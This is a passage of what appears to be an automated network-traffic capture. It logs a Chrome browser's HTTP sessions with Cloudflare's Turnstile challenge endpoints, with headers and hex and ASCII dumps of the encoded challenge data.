                                                                                                                              2024-11-18 16:55:56 UTC15614OUTData Raw: 55 53 32 33 6a 36 6b 54 6b 24 4c 75 5a 45 37 6f 43 57 6b 5a 5a 31 7a 6d 5a 6f 5a 76 5a 69 69 51 31 6f 4e 61 54 5a 4c 54 53 42 43 42 69 5a 56 53 7a 4b 5a 49 58 4b 5a 35 30 48 30 61 69 53 33 53 66 78 4b 6b 5a 24 5a 5a 79 51 6b 58 69 53 5a 46 66 58 5a 73 5a 4c 53 4c 54 53 4b 64 6b 6f 5a 42 5a 4d 53 74 43 4c 4c 5a 24 53 35 4f 6a 77 5a 6d 46 4c 6b 51 58 5a 30 53 4c 49 73 49 5a 62 5a 5a 2d 5a 36 5a 38 53 63 5a 66 37 65 51 67 42 37 51 2d 67 79 5a 66 24 66 71 43 62 53 66 49 4c 2d 5a 6a 77 36 2d 4c 62 5a 44 36 42 6e 55 79 5a 2b 53 5a 61 51 69 5a 30 30 53 65 4c 54 53 38 53 31 72 61 73 67 51 6f 53 2d 66 2d 5a 75 43 42 6b 66 31 53 68 5a 6e 5a 63 73 53 46 5a 6b 53 32 6b 5a 57 5a 4d 53 5a 63 5a 69 5a 5a 46 5a 78 5a 73 5a 63 4e 53 76 45 63 53 6f 67 66 36 5a 78 53 4c 4b
                                                                                                                              Data Ascii: US23j6kTk$LuZE7oCWkZZ1zmZoZvZiiQ1oNaTZLTSBCBiZVSzKZIXKZ50H0aiS3SfxKkZ$ZZyQkXiSZFfXZsZLSLTSKdkoZBZMStCLLZ$S5OjwZmFLkQXZ0SLIsIZbZZ-Z6Z8ScZf7eQgB7Q-gyZf$fqCbSfIL-Zjw6-LbZD6BnUyZ+SZaQiZ00SeLTS8S1rasgQoS-f-ZuCBkf1ShZnZcsSFZkS2kZWZMSZcZiZZFZxZsZcNSvEcSogf6ZxSLK
                                                                                                                              2024-11-18 16:55:56 UTC330INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:56 GMT
                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                              Content-Length: 26328
                                                                                                                              Connection: close
                                                                                                                              cf-chl-gen: iAoBre/rzEBmYR3xmn46VgmAqzTsU2kpa+XOGJZkxWVUxcp3/Ak8WyTIwI282NeHlcu5QVi/osXb7kON$XYlBgmowL1Fmh6JI
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497db0f9d76bb3-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:56 UTC1039INData Raw: 71 58 69 4d 77 5a 61 66 6c 72 47 57 79 4a 61 7a 6e 4d 50 49 6d 62 71 6e 71 71 57 4d 30 4b 71 70 6b 4e 53 55 76 4b 62 59 31 39 4b 62 79 39 79 75 7a 72 76 59 74 61 50 56 31 39 57 6c 72 63 48 43 75 63 43 39 36 4b 76 67 37 39 57 7a 7a 75 76 54 74 61 2f 4e 30 73 6e 67 7a 66 79 38 78 51 44 67 78 74 30 46 32 66 62 6a 42 64 6e 4c 35 74 30 41 43 78 41 52 35 77 50 76 45 65 66 54 47 75 33 62 47 41 77 64 39 41 2f 37 48 4f 44 65 4a 2f 37 32 33 69 59 4b 41 2f 6f 6e 2f 53 66 77 4d 51 49 6e 41 53 55 38 48 50 4d 54 4f 43 37 37 4c 44 30 58 4c 78 78 45 42 67 4a 46 47 69 52 4b 43 45 68 4d 44 77 77 39 49 68 49 52 44 68 42 56 45 68 67 39 4e 55 35 62 4d 69 78 58 4d 6c 59 63 4a 6c 68 52 49 57 56 4b 54 44 56 44 63 46 73 74 4d 57 74 49 53 6b 6c 79 5a 54 4a 4b 55 47 39 70 5a 33 56
                                                                                                                              Data Ascii: qXiMwZaflrGWyJaznMPImbqnqqWM0KqpkNSUvKbY19Kby9yuzrvYtaPV19WlrcHCucC96Kvg79WzzuvTta/N0sngzfy8xQDgxt0F2fbjBdnL5t0ACxAR5wPvEefTGu3bGAwd9A/7HODeJ/723iYKA/on/SfwMQInASU8HPMTOC77LD0XLxxEBgJFGiRKCEhMDww9IhIRDhBVEhg9NU5bMixXMlYcJlhRIWVKTDVDcFstMWtISklyZTJKUG9pZ3V
                                                                                                                              2024-11-18 16:55:56 UTC1369INData Raw: 48 6d 62 72 53 6e 39 50 4f 6f 4b 62 56 77 62 71 52 30 71 53 58 6e 73 32 78 33 63 4c 58 7a 39 76 67 33 4c 62 70 76 71 57 70 36 38 4c 4f 34 4f 2f 47 30 72 37 7a 79 74 66 34 39 38 37 62 37 2b 7a 49 37 4c 6e 61 77 62 72 75 7a 74 36 2f 33 51 72 36 32 51 77 44 41 78 48 47 42 64 2f 38 7a 67 76 69 44 39 67 51 39 52 73 46 47 76 54 65 37 68 58 65 45 51 51 52 41 67 59 5a 39 78 34 46 43 2b 55 5a 36 53 63 63 4c 69 6b 54 37 53 59 44 4d 77 6b 55 4b 66 63 61 4e 42 34 33 45 52 77 78 44 2f 30 55 52 6a 51 59 53 50 30 64 50 67 6b 4b 53 68 77 6e 4a 55 4d 65 46 7a 56 4e 4a 45 73 73 4b 42 41 70 58 30 38 33 51 6b 42 42 54 69 42 45 55 7a 63 35 4e 43 56 5a 57 30 6c 6c 50 31 4a 79 59 44 52 32 57 48 46 54 64 32 35 4a 54 6b 6f 34 65 47 4d 31 65 6f 4a 44 68 6e 53 46 69 33 78 59 52 45
                                                                                                                              Data Ascii: HmbrSn9POoKbVwbqR0qSXns2x3cLXz9vg3LbpvqWp68LO4O/G0r7zytf4987b7+zI7Lnawbruzt6/3Qr62QwDAxHGBd/8zgviD9gQ9RsFGvTe7hXeEQQRAgYZ9x4FC+UZ6SccLikT7SYDMwkUKfcaNB43ERwxD/0URjQYSP0dPgkKShwnJUMeFzVNJEssKBApX083QkBBTiBEUzc5NCVZW0llP1JyYDR2WHFTd25JTko4eGM1eoJDhnSFi3xYRE
                                                                                                                              2024-11-18 16:55:56 UTC1369INData Raw: 74 70 62 47 71 4b 47 52 78 62 7a 46 72 4d 75 62 77 63 37 56 7a 4e 44 6c 75 74 6a 53 74 4e 72 41 71 38 62 64 36 63 76 51 77 50 48 6a 35 75 6e 74 39 38 50 5a 32 72 58 32 33 38 37 4f 37 50 4f 39 31 2b 4c 41 38 67 50 55 34 77 6e 6a 39 67 6e 6c 36 76 76 30 46 75 6a 50 38 76 62 6f 42 2b 51 4e 31 51 66 61 30 67 44 62 37 69 48 6b 42 42 67 6e 34 53 6e 70 41 68 38 6a 35 69 7a 75 46 41 77 6c 45 41 6b 44 43 41 6b 32 39 69 6b 6e 48 2f 6b 42 4d 67 34 6a 4e 30 41 63 4d 68 38 2f 4c 41 59 69 53 79 63 43 45 55 73 2f 53 44 45 6d 4e 30 68 48 57 56 6f 59 57 45 74 49 47 54 63 78 52 42 31 69 58 31 41 69 4b 56 6f 32 53 6a 6c 6f 52 46 70 48 61 30 73 77 4a 32 4e 66 4e 44 6b 33 58 46 52 73 65 44 70 35 67 6f 42 68 55 59 4a 34 64 6e 57 44 52 6b 68 4b 59 32 4a 71 61 30 69 54 57 34 43
                                                                                                                              Data Ascii: tpbGqKGRxbzFrMubwc7VzNDlutjStNrAq8bd6cvQwPHj5unt98PZ2rX2387O7PO91+LA8gPU4wnj9gnl6vv0FujP8vboB+QN1Qfa0gDb7iHkBBgn4SnpAh8j5izuFAwlEAkDCAk29iknH/kBMg4jN0AcMh8/LAYiSycCEUs/SDEmN0hHWVoYWEtIGTcxRB1iX1AiKVo2SjloRFpHa0swJ2NfNDk3XFRseDp5goBhUYJ4dnWDRkhKY2Jqa0iTW4C
                                                                                                                              2024-11-18 16:55:56 UTC1369INData Raw: 4a 54 56 70 35 61 2f 33 39 32 38 7a 72 53 2f 34 4a 2f 59 34 4e 36 69 71 2b 7a 4b 76 74 6d 36 38 4e 2f 57 35 4f 33 31 34 65 6a 62 78 39 33 73 75 75 6e 68 38 4c 2f 34 30 4e 44 50 2b 64 7a 56 31 4e 77 48 79 2b 7a 70 36 2f 76 6c 42 75 63 57 36 65 45 49 38 2b 6b 4d 38 51 33 75 38 42 6a 35 44 68 45 54 46 64 34 56 45 77 7a 6c 47 43 63 4d 36 67 62 2b 4c 53 55 72 48 2f 41 58 38 43 73 34 4b 68 54 76 47 2f 59 50 44 7a 6a 38 4f 69 34 41 41 44 49 64 50 77 4d 4a 4c 43 59 2b 4d 6a 41 6f 51 6b 45 4f 50 78 4d 4c 56 52 5a 4e 55 56 68 48 57 31 5a 4d 4d 44 31 44 48 6c 45 69 59 54 64 47 53 68 38 39 59 45 55 6a 4b 6c 35 74 55 30 55 76 64 6d 52 49 52 56 42 61 53 6b 70 36 58 6b 35 4d 66 6d 4a 56 4f 59 4a 6d 57 55 46 56 5a 33 6c 33 66 6e 78 66 55 6d 64 78 64 57 42 50 67 56 70 75
                                                                                                                              Data Ascii: JTVp5a/3928zrS/4J/Y4N6iq+zKvtm68N/W5O314ejbx93suunh8L/40NDP+dzV1NwHy+zp6/vlBucW6eEI8+kM8Q3u8Bj5DhETFd4VEwzlGCcM6gb+LSUrH/AX8Cs4KhTvG/YPDzj8Oi4AADIdPwMJLCY+MjAoQkEOPxMLVRZNUVhHW1ZMMD1DHlEiYTdGSh89YEUjKl5tU0UvdmRIRVBaSkp6Xk5MfmJVOYJmWUFVZ3l3fnxfUmdxdWBPgVpu
                                                                                                                              2024-11-18 16:55:56 UTC1369INData Raw: 43 73 30 5a 32 66 72 36 48 6c 33 4f 58 6d 34 4c 66 6b 72 4f 44 6e 37 65 4b 6e 79 2b 2b 79 36 76 6a 63 79 74 72 57 34 4c 6a 57 36 75 53 38 39 4f 4c 6c 77 4f 72 69 78 38 77 45 36 51 33 34 44 63 37 53 34 68 55 41 39 51 33 72 44 75 38 52 31 52 6a 5a 48 42 6f 6a 37 74 34 41 41 52 67 42 39 68 67 4b 2f 68 6f 76 2b 75 76 6f 36 77 6f 72 49 2f 41 47 4d 42 59 55 50 66 73 74 2b 41 41 56 41 67 77 42 2f 68 46 46 42 67 49 47 49 79 67 49 54 53 73 77 4d 54 30 51 50 79 52 56 53 6a 59 35 4b 43 63 34 55 79 77 75 54 55 42 4f 4c 30 52 44 52 79 56 4a 52 30 73 6d 57 32 41 37 4b 55 30 2b 5a 53 35 65 4c 55 74 56 56 57 39 48 55 31 31 4d 55 7a 35 73 4f 56 73 36 59 48 70 59 54 33 52 58 57 33 68 36 61 34 31 50 65 55 6d 4a 55 58 31 69 6c 55 32 42 64 35 6d 4b 68 57 70 72 58 34 36 56 66
                                                                                                                              Data Ascii: Cs0Z2fr6Hl3OXm4LfkrODn7eKny++y6vjcytrW4LjW6uS89OLlwOrix8wE6Q34Dc7S4hUA9Q3rDu8R1RjZHBoj7t4AARgB9hgK/hov+uvo6worI/AGMBYUPfst+AAVAgwB/hFFBgIGIygITSswMT0QPyRVSjY5KCc4UywuTUBOL0RDRyVJR0smW2A7KU0+ZS5eLUtVVW9HU11MUz5sOVs6YHpYT3RXW3h6a41PeUmJUX1ilU2Bd5mKhWprX46Vf
                                                                                                                              2024-11-18 16:55:56 UTC1369INData Raw: 6d 74 4b 48 71 34 65 50 74 78 4e 6d 79 37 2b 33 4d 73 2f 48 79 34 62 6a 33 33 65 6d 39 2b 75 72 70 34 51 44 43 7a 77 61 39 33 41 76 4b 31 67 6f 4d 32 39 6a 2b 35 65 49 56 36 2b 67 58 34 41 66 78 34 75 62 6b 46 2f 4c 70 33 2f 54 59 37 51 30 54 37 69 63 69 34 75 63 6d 34 69 59 76 4c 79 6f 75 37 69 66 79 4e 75 34 33 4d 43 62 34 4e 68 41 4e 2f 51 6b 5a 2b 42 46 45 47 55 51 5a 45 6a 63 64 43 78 64 4b 54 78 6b 47 54 30 5a 49 55 69 6b 2b 46 31 52 53 4d 52 68 57 56 30 59 64 58 45 4a 4f 49 6c 39 50 54 6b 5a 6b 4a 7a 52 71 49 6b 46 73 51 54 70 66 54 6b 46 30 50 56 5a 46 51 46 41 30 4e 6e 70 36 50 56 42 33 51 45 31 52 67 57 35 2b 69 44 71 43 58 56 6d 49 53 34 4a 75 6a 57 52 78 59 59 64 54 6b 70 57 53 68 70 68 6c 5a 56 4e 78 63 32 71 50 6d 47 31 57 6b 34 4a 31 71 48
                                                                                                                              Data Ascii: mtKHq4ePtxNmy7+3Ms/Hy4bj33em9+urp4QDCzwa93AvK1goM29j+5eIV6+gX4Afx4ubkF/Lp3/TY7Q0T7ici4ucm4iYvLyou7ifyNu43MCb4NhAN/QkZ+BFEGUQZEjcdCxdKTxkGT0ZIUik+F1RSMRhWV0YdXEJOIl9PTkZkJzRqIkFsQTpfTkF0PVZFQFA0Nnp6PVB3QE1RgW5+iDqCXVmIS4JujWRxYYdTkpWShphlZVNxc2qPmG1Wk4J1qH
                                                                                                                              2024-11-18 16:55:56 UTC1369INData Raw: 33 64 2b 2f 75 2b 4b 73 76 38 44 51 39 38 6e 44 2b 74 58 4b 73 63 6a 64 31 38 37 4d 31 64 44 50 39 75 58 57 30 2b 54 73 79 64 6a 2b 37 64 33 62 45 2b 33 6b 33 77 63 45 34 2b 54 7a 44 4f 7a 6e 36 4f 33 73 37 76 7a 78 38 50 44 77 46 50 58 64 39 41 37 35 2b 43 38 4b 2b 76 37 38 41 67 77 42 4a 78 6e 31 42 53 73 38 44 51 6b 4a 4c 41 38 4e 4d 77 34 55 45 54 59 34 47 68 55 37 47 69 51 59 54 7a 77 66 48 78 30 75 49 77 6f 68 52 43 6f 6b 4a 53 6f 71 4b 45 38 71 4c 69 78 6a 52 53 49 78 5a 7a 59 34 4e 46 74 47 4f 54 68 4a 63 45 41 38 4b 32 52 47 51 47 64 53 52 30 56 37 53 6b 31 4c 53 56 70 4c 4e 6b 31 4f 55 31 4e 68 55 6c 52 55 69 32 70 6b 57 56 6c 4d 54 6c 32 44 61 6d 42 67 59 58 70 71 5a 5a 74 6d 5a 31 4a 70 61 6e 4a 74 62 59 5a 31 63 4b 64 2b 65 6e 53 45 6e 48 68
                                                                                                                              Data Ascii: 3d+/u+Ksv8DQ98nD+tXKscjd187M1dDP9uXW0+Tsydj+7d3bE+3k3wcE4+TzDOzn6O3s7vzx8PDwFPXd9A75+C8K+v78AgwBJxn1BSs8DQkJLA8NMw4UETY4GhU7GiQYTzwfHx0uIwohRCokJSoqKE8qLixjRSIxZzY4NFtGOThJcEA8K2RGQGdSR0V7Sk1LSVpLNk1OU1NhUlRUi2pkWVlMTl2DamBgYXpqZZtmZ1JpanJtbYZ1cKd+enSEnHh
                                                                                                                              2024-11-18 16:55:56 UTC1369INData Raw: 65 6e 4b 71 39 54 7a 36 62 65 35 38 2b 37 31 33 62 58 56 2b 39 63 48 76 67 72 79 76 64 54 32 7a 67 67 4c 2f 74 45 49 45 67 54 6a 34 4d 37 53 45 78 76 53 48 67 66 52 36 41 4c 77 32 52 49 57 47 66 45 54 45 2b 6b 67 4b 68 34 4b 37 69 67 79 4b 79 6b 69 43 42 49 77 4d 44 73 37 4d 53 72 33 2b 54 51 76 4e 69 54 31 46 6a 67 59 50 43 41 36 4b 78 59 75 42 41 70 46 54 30 63 68 43 69 59 55 45 6b 77 50 46 42 5a 52 53 31 4a 4b 45 6a 49 5a 4e 46 6b 38 56 6c 45 79 53 6b 45 6d 58 6d 74 6a 50 53 5a 43 62 79 35 72 54 44 42 49 61 7a 59 35 52 33 52 56 63 30 30 32 55 6c 6b 2b 64 30 4a 46 55 34 42 32 52 45 5a 2f 53 6b 31 63 69 47 6d 48 59 55 70 6d 6c 31 4b 4c 56 6c 6c 6f 6c 49 70 59 57 70 4e 65 59 58 47 63 66 5a 74 31 58 6e 70 6b 5a 70 39 71 62 58 32 6f 6e 6d 78 75 70 33 4a 31
                                                                                                                              Data Ascii: enKq9Tz6be58+713bXV+9cHvgryvdT2zggL/tEIEgTj4M7SExvSHgfR6ALw2RIWGfETE+kgKh4K7igyKykiCBIwMDs7MSr3+TQvNiT1FjgYPCA6KxYuBApFT0chCiYUEkwPFBZRS1JKEjIZNFk8VlEySkEmXmtjPSZCby5rTDBIazY5R3RVc002Ulk+d0JFU4B2REZ/Sk1ciGmHYUpml1KLVllolIpYWpNeYXGcfZt1XnpkZp9qbX2onmxup3J1


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.1749740104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:57 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:57 UTC379INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:57 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 7
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              cf-chl-out: sQdPlVolUZWPsIUQkYK9hw0iSOpZytk4aj4=$dGb2SmUqG5RJlwkr
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497db89c316c52-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:57 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                              Data Ascii: invalid


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.1749741104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:59 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 34417
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              CF-Challenge: MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:59 UTC16384OUTData Raw: 76 5f 38 65 34 39 37 64 38 31 33 63 62 36 32 66 66 34 3d 42 61 6b 53 72 4c 66 77 49 74 49 54 49 66 6f 66 62 5a 70 5a 31 56 36 5a 72 5a 32 5a 62 67 66 74 66 34 5a 38 53 51 74 66 37 5a 42 43 63 77 6d 5a 6a 6b 53 4d 43 36 64 61 66 71 5a 6e 59 55 5a 66 49 75 57 5a 75 67 66 44 4c 5a 4d 6b 5a 63 68 5a 36 6d 5a 73 72 68 61 53 5a 57 48 53 66 24 75 4c 4d 66 4c 54 5a 45 53 36 74 5a 4c 58 59 46 5a 39 5a 63 41 37 65 4a 53 54 57 4b 5a 64 58 4a 53 66 39 47 72 49 24 24 5a 52 53 56 2d 49 49 54 78 5a 66 25 32 62 5a 4e 50 37 38 53 5a 6e 5a 5a 2b 56 5a 36 2b 37 2d 4e 59 39 4d 79 58 4c 4a 4d 58 61 37 6b 5a 4d 79 79 72 44 4c 31 51 56 63 53 66 72 4d 53 52 57 76 53 5a 42 75 67 5a 32 35 6e 78 78 77 49 66 55 74 72 6b 62 79 6e 71 65 6b 73 54 4b 50 39 70 62 44 75 2d 39 50 70 62 4c
                                                                                                                              Data Ascii: v_8e497d813cb62ff4=BakSrLfwItITIfofbZpZ1V6ZrZ2Zbgftf4Z8SQtf7ZBCcwmZjkSMC6dafqZnYUZfIuWZugfDLZMkZchZ6mZsrhaSZWHSf$uLMfLTZES6tZLXYFZ9ZcA7eJSTWKZdXJSf9GrI$$ZRSV-IITxZf%2bZNP78SZnZZ+VZ6+7-NY9MyXLJMXa7kZMyyrDL1QVcSfrMSRWvSZBugZ25nxxwIfUtrkbynqeksTKP9pbDu-9PpbL
                                                                                                                              2024-11-18 16:55:59 UTC16384OUTData Raw: 55 53 32 33 6a 36 6b 54 6b 24 4c 75 5a 45 37 6f 43 57 6b 5a 5a 31 7a 6d 5a 6f 5a 76 5a 69 69 51 31 6f 4e 61 54 5a 4c 54 53 42 43 42 69 5a 56 53 7a 4b 5a 49 58 4b 5a 35 30 48 30 61 69 53 33 53 66 78 4b 6b 5a 24 5a 5a 79 51 6b 58 69 53 5a 46 66 58 5a 73 5a 4c 53 4c 54 53 4b 64 6b 6f 5a 42 5a 4d 53 74 43 4c 4c 5a 24 53 35 4f 6a 77 5a 6d 46 4c 6b 51 58 5a 30 53 4c 49 73 49 5a 62 5a 5a 2d 5a 36 5a 38 53 63 5a 66 37 65 51 67 42 37 51 2d 67 79 5a 66 24 66 71 43 62 53 66 49 4c 2d 5a 6a 77 36 2d 4c 62 5a 44 36 42 6e 55 79 5a 2b 53 5a 61 51 69 5a 30 30 53 65 4c 54 53 38 53 31 72 61 73 67 51 6f 53 2d 66 2d 5a 75 43 42 6b 66 31 53 68 5a 6e 5a 63 73 53 46 5a 6b 53 32 6b 5a 57 5a 4d 53 5a 63 5a 69 5a 5a 46 5a 78 5a 73 5a 63 4e 53 76 45 63 53 6f 67 66 36 5a 78 53 4c 4b
                                                                                                                              Data Ascii: US23j6kTk$LuZE7oCWkZZ1zmZoZvZiiQ1oNaTZLTSBCBiZVSzKZIXKZ50H0aiS3SfxKkZ$ZZyQkXiSZFfXZsZLSLTSKdkoZBZMStCLLZ$S5OjwZmFLkQXZ0SLIsIZbZZ-Z6Z8ScZf7eQgB7Q-gyZf$fqCbSfIL-Zjw6-LbZD6BnUyZ+SZaQiZ00SeLTS8S1rasgQoS-f-ZuCBkf1ShZnZcsSFZkS2kZWZMSZcZiZZFZxZsZcNSvEcSogf6ZxSLK
                                                                                                                              2024-11-18 16:55:59 UTC1649OUTData Raw: 50 34 6e 62 5a 5a 66 34 46 5a 38 43 42 2d 66 50 71 6e 62 65 4a 59 49 5a 38 53 56 45 63 6f 77 72 45 2d 34 4c 77 38 44 42 76 6f 66 74 5a 4d 5a 4d 6f 6b 4a 5a 37 64 41 74 4f 68 56 66 75 4a 67 5a 76 76 45 6e 56 77 66 32 5a 66 53 69 47 39 31 24 64 2d 67 39 66 31 4b 54 64 57 33 66 64 73 38 53 4d 50 66 49 78 57 4c 75 35 50 50 2d 78 79 36 2d 51 31 6f 66 58 6e 6e 36 24 67 78 5a 6b 50 63 4a 75 69 6d 62 36 50 4d 41 4e 43 63 72 45 63 48 51 43 36 7a 7a 43 43 32 53 56 78 5a 46 64 31 6b 74 6b 4e 43 4d 43 49 62 4f 39 6d 48 72 77 69 57 63 37 38 62 6d 6b 6f 66 59 5a 4b 64 63 47 36 55 43 73 67 36 61 4c 6f 77 41 2d 67 62 72 48 50 6f 58 2d 67 51 37 41 56 67 51 67 51 4d 73 2b 56 4b 44 51 66 37 44 61 45 4d 59 48 44 36 67 74 6b 5a 58 71 46 4c 69 4b 38 54 65 69 53 6b 4b 76 79 41
                                                                                                                              Data Ascii: P4nbZZf4FZ8CB-fPqnbeJYIZ8SVEcowrE-4Lw8DBvoftZMZMokJZ7dAtOhVfuJgZvvEnVwf2ZfSiG91$d-g9f1KTdW3fds8SMPfIxWLu5PP-xy6-Q1ofXnn6$gxZkPcJuimb6PMANCcrEcHQC6zzCC2SVxZFd1ktkNCMCIbO9mHrwiWc78bmkofYZKdcG6UCsg6aLowA-gbrHPoX-gQ7AVgQgQMs+VKDQf7DaEMYHD6gtkZXqFLiK8TeiSkKvyA
                                                                                                                              2024-11-18 16:56:00 UTC1300INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:56:00 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Content-Length: 6032
                                                                                                                              Connection: close
                                                                                                                              cf-chl-out-s: TnNkOoIpFORelZ6j0Rc/52PucnKTkCF4kYWWhXkJ0ga4j6p/yPxfX1CX+UpL595txvEXlX7Rqm3WSttmPMgk5cA0WgOuoYnJqwPEKazQYSaa8yqDdGB8za1fHm9DAIdaJrMaWpz/gtZW2tum3EynaqiX6v9pLkbSrXcEhUZaF4igLnCP2YDhHEISAd2IWCpQCmKuKCLfNlhQPamu8/cwORO2GD6TaCuBarnONRZd7gugEMlLygEWa1Qab5mfOofjfbwy7ssHZ/6QygyEYqnjaX4ETkUgSDOcTxEFNb8nkSc5JSi1pxlDiR9iziez/arFVAcvIMPTwYPWvPC1vc/E/XePFTp7/x+9Fd1jDLLAD6EdUz3B1/osjm0kPyvMnS74uxiGTRszz5XNaky0u8VjPv9rMbHk78jwAD9ir+vGSSe4GoxLX+lEquLEB6A/Qd6CM2sKLHJc0C1X/NYyZRt061bD4vMq/kHFsPGVUjrb1irXsc2jFz4Ob0xHwL49qriiTIoLsyEbqyxWORQnETXZ0hj0/fsx6BaLAtTTZEsbkF1ixDGlfvPKEZW9PZMlPYlX4KxJkrdNR8O57yfpI6fetXT1ZIhNZgLZVuTVjB+02waEbTLlklOX8GHx9dRY4OqBuGha08Ewm3z0OCfXpWwLkks9c+MryIdP0derQ6uvj9/siRB7tbw/R4npgsGEGo3IpJf3+5YLwa4HAOhNRrYZOQ6CvB5ZdvaldJdaSS3CAHJNeq2iRUkg/YIgReSVeh4Amxh/5ndw+SrWYWoD/Hd3FJPolXsbyfLVPHI6gnj4P/pseLHhHjMMzxnZm/K1F+hFwzibKDY1E0QTLaB5o8W2TwQ/zMk9e9mYhwZ61yGwB0rfu9DKlRuUmtyyZlYF+l04+snkZaRTqmchB7h5EwAeShCt9CM+BtmBdN8yJvdDMBI+rKWQEJOzMe8z8BA/qK8oVhIdzGjheoLQEujd/VfL21ru3Nx6Bi1fgVMnFjbbpmXjy2owzK [TRUNCATED]
                                                                                                                              2024-11-18 16:56:00 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 54 61 39 64 47 77 67 7a 68 54 4a 71 79 48 2b 44 36 33 58 50 48 4e 68 51 67 4f 77 79 46 6d 4d 38 2f 55 62 34 71 41 75 58 6d 44 70 55 6d 37 69 7a 4d 6e 59 43 41 76 33 58 42 64 75 63 47 4c 6b 50 78 6d 7a 79 4f 39 49 31 55 6b 69 51 77 41 41 32 73 43 68 36 6a 74 4c 32 70 52 48 58 4a 54 4e 59 69 49 70 4f 30 62 6f 57 61 56 6b 44 63 4d 36 79 62 39 55 71 2f 51 3d 3d 24 46 30 6d 30 72 63 78 6b 67 62 2f 47 6e 6e 7a 42 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 34 39 37 64 63 36 61 64 66 65 33 61 63 37 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: cf-chl-out: Ta9dGwgzhTJqyH+D63XPHNhQgOwyFmM8/Ub4qAuXmDpUm7izMnYCAv3XBducGLkPxmzyO9I1UkiQwAA2sCh6jtL2pRHXJTNYiIpO0boWaVkDcM6yb9Uq/Q==$F0m0rcxkgb/GnnzBServer: cloudflareCF-RAY: 8e497dc6adfe3ac7-DFWalt-svc: h3=":443"; ma=86400
